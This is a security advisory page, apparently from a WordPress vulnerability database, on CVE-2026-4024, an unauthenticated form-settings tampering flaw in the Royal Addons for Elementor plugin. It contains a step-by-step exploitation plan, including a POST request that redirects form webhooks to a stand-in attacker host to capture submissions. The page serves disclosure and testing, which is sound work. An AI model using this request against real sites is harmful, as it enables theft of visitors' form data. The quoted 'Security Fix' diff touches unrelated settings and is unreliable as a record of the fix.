CVE-2026-4024

Royal Addons for Elementor <= 1.7.1056 - Missing Authorization to Unauthenticated Form Action Meta Modification

mediumMissing Authorization

5.3

CVSS Score

5.3

CVSS Score

medium

Severity

1.7.1057

Patched in

Time to patch

Description

The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action in all versions up to, and including, 1.7.1056. The handler is registered on both `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. Although a nonce is verified, the nonce (`wpr-addons-js`) is publicly exposed in frontend JavaScript via `WprConfig.nonce` on any page that loads Royal Addons widgets, rendering the protection ineffective. The endpoint also lacks any capability or ownership checks and directly calls `update_post_meta()` with user-controlled input on a whitelisted set of form action meta keys. This makes it possible for unauthenticated attackers to modify form action configuration metadata (email, submissions, Mailchimp, and webhook settings) on any post, potentially leading to webhook/email action tampering and data exfiltration via modified webhook URLs.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

None

Confidentiality

Low

Integrity

None

Availability

Technical Details

Affected versions<=1.7.1056

PublishedMay 1, 2026

Last updatedMay 2, 2026

Affected pluginroyal-elementor-addons

What Changed in the Fix

Changes introduced in v1.7.1057

Loading patch diff...

Source Code

WordPress.org SVN

Vulnerable v1.7.1056

Browse source Download .zip

Patched v1.7.1057

Browse source Download .zip

Research Plan

Unverified

# Exploitation Research Plan - CVE-2026-4024 ## 1. Vulnerability Summary The **Royal Addons for Elementor** plugin (up to version 1.7.1056) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function `wpr_update_form_action_meta` is registered to both `wp_a…

Show full research plan

Exploitation Research Plan - CVE-2026-4024

1. Vulnerability Summary

The Royal Addons for Elementor plugin (up to version 1.7.1056) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function wpr_update_form_action_meta is registered to both wp_ajax and wp_ajax_nopriv hooks, making it accessible to unauthenticated users. The function allows the modification of post metadata without verifying if the requesting user has the authority to edit the post or the settings. While it performs a nonce check (wpr-addons-js), this nonce is leaked on the frontend via the WprConfig.nonce JavaScript variable, rendering the protection ineffective.

2. Attack Vector Analysis

Endpoint: /wp-admin/admin-ajax.php
Action: wpr_update_form_action_meta
HTTP Method: POST
Authentication: Unauthenticated
Required Parameters:
- action: wpr_update_form_action_meta
- nonce: The value of wpr-addons-js (found in WprConfig.nonce)
- post_id: The ID of the post/page to modify.
- meta_key: A whitelisted meta key (e.g., wpr_form_webhook_url, wpr_form_email_to) (inferred from description).
- meta_value: The new value for the meta key (e.g., an attacker-controlled webhook URL).

3. Code Flow

Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=wpr_update_form_action_meta.
Hook Execution: WordPress triggers the handler registered to wp_ajax_nopriv_wpr_update_form_action_meta.
Nonce Verification: The handler calls check_ajax_referer('wpr-addons-js', 'nonce') (inferred). Since the attacker provides the leaked nonce from the frontend, this check passes.
Authorization Check: The handler lacks any call to current_user_can() or ownership checks.
Data Update: The handler retrieves post_id, meta_key, and meta_value from the $_POST array.
Sink: The handler calls update_post_meta($post_id, $meta_key, $meta_value) after verifying the meta_key against a whitelist of form settings.
Result: Metadata associated with a Royal Addons form (like its webhook destination) is modified.

4. Nonce Acquisition Strategy

The nonce is localized for the plugin's frontend scripts. To obtain it:

Identify Script Loading: The plugin enqueues WprConfig on pages that use Royal Addons widgets (like the Form Builder).
Create Trigger Content: Use WP-CLI to create a page containing a Royal Addons form shortcode or widget.
Navigate and Extract:
- Use browser_navigate to visit the created page.
- Use browser_eval to extract the nonce from the global WprConfig object.

Extraction JS:

window.WprConfig?.nonce

5. Exploitation Strategy

Step 1: Discover/Create Target

Find an existing post ID or create a dummy page to prove the ability to modify meta.

Step 2: Get the Nonce

Navigate to any frontend page where the plugin is active and extract WprConfig.nonce.

Step 3: Modify Form Settings

Send a crafted AJAX request to redirect form submissions to an external listener.

Request Details:

URL: http://<target-site>/wp-admin/admin-ajax.php
Method: POST
Headers: Content-Type: application/x-www-form-urlencoded
Body:

action=wpr_update_form_action_meta&nonce=[EXTRACTED_NONCE]&post_id=[TARGET_ID]&meta_key=wpr_form_webhook_url&meta_value=https://attacker-collector.com/leak

(Note: Based on the description, wpr_form_webhook_url is a likely whitelisted key for the Form Action modification).

6. Test Data Setup

Install Plugin: Ensure royal-elementor-addons v1.7.1056 is active.

Create Target Page:

wp post create --post_type=page --post_title="Royal Form Page" --post_status=publish --post_content='[wpr-form-builder]'

Note the ID: Capture the ID of the created post (e.g., 123).

7. Expected Results

The AJAX request should return a successful response (likely JSON {"success": true} or a string 1).
The post meta for the target ID will be updated in the database.

8. Verification Steps

After performing the exploit, verify the database state using WP-CLI:

wp post meta get [TARGET_ID] wpr_form_webhook_url

Success Condition: The command returns https://attacker-collector.com/leak.

9. Alternative Approaches

If wpr_form_webhook_url is not the exact key name, the following keys (whitelisted for form actions) should be tried:

wpr_form_email_to (Modify where notification emails are sent)
wpr_form_mailchimp_api_key (Modify Mailchimp integration)
_wpr_form_webhook_url (Check for underscored prefix)

If the WprConfig object is not found on the homepage, check if it's nested under another object or examine the page source for:
wp_localize_script( ..., 'WprConfig', ... )
to confirm the localization handle.

Research Findings

Static analysis — not yet PoC-verified

Summary

The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpr_update_form_action_meta' AJAX action. An unauthenticated attacker can modify form configuration metadata—such as webhook URLs and email recipients—by exploiting a publicly exposed nonce, potentially leading to the exfiltration of sensitive form submission data.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1056/admin/plugin-options.php /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1057/admin/plugin-options.php
--- /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1056/admin/plugin-options.php	2026-04-03 11:57:32.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1057/admin/plugin-options.php	2026-04-10 10:58:42.000000000 +0000
@@ -120,6 +120,8 @@
     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');
     register_setting('wpr-extension-settings', 'wpr-custom-css');
     register_setting('wpr-extension-settings', 'wpr-display-conditions');
+    register_setting('wpr-extension-settings', 'wpr-equal-height');
+    // register_setting('wpr-extension-settings', 'wpr-column-slider');
     register_setting('wpr-extension-settings', 'wpr-sticky-section');
 
     // Element Toggle
@@ -1630,6 +1632,12 @@
                         echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
                     } elseif ( 'wpr-display-conditions' === $option_name ) {
                         echo '<br><span>Tip: Edit any Element > Navigate to Visibility tab</span>';
+                    } elseif ( 'wpr-column-slider' === $option_name ) {
+                        echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
+                        // echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';
+                    } elseif ( 'wpr-equal-height' === $option_name ) {
+                        echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
+                        // echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';
                     }
 ... (truncated)

Exploit Outline

1. Nonce Retrieval: Navigate to any frontend page where Royal Addons widgets are loaded and extract the 'wpr-addons-js' nonce from the global 'WprConfig.nonce' JavaScript variable. 2. Target Identification: Identify the 'post_id' of a post or page containing a Royal Addons form. 3. Unauthorized Modification: Send an unauthenticated AJAX POST request to '/wp-admin/admin-ajax.php' with the action 'wpr_update_form_action_meta'. 4. Payload: Include the extracted nonce, the target 'post_id', a whitelisted 'meta_key' (such as 'wpr_form_webhook_url'), and a malicious 'meta_value' (e.g., an attacker-controlled listener URL). 5. Verification: Upon success, subsequent form submissions from that post will be directed to the attacker's controlled endpoint, allowing for data interception.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/2ecec7d7-d1b2-4ccf-ade6-1f78224968c6?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database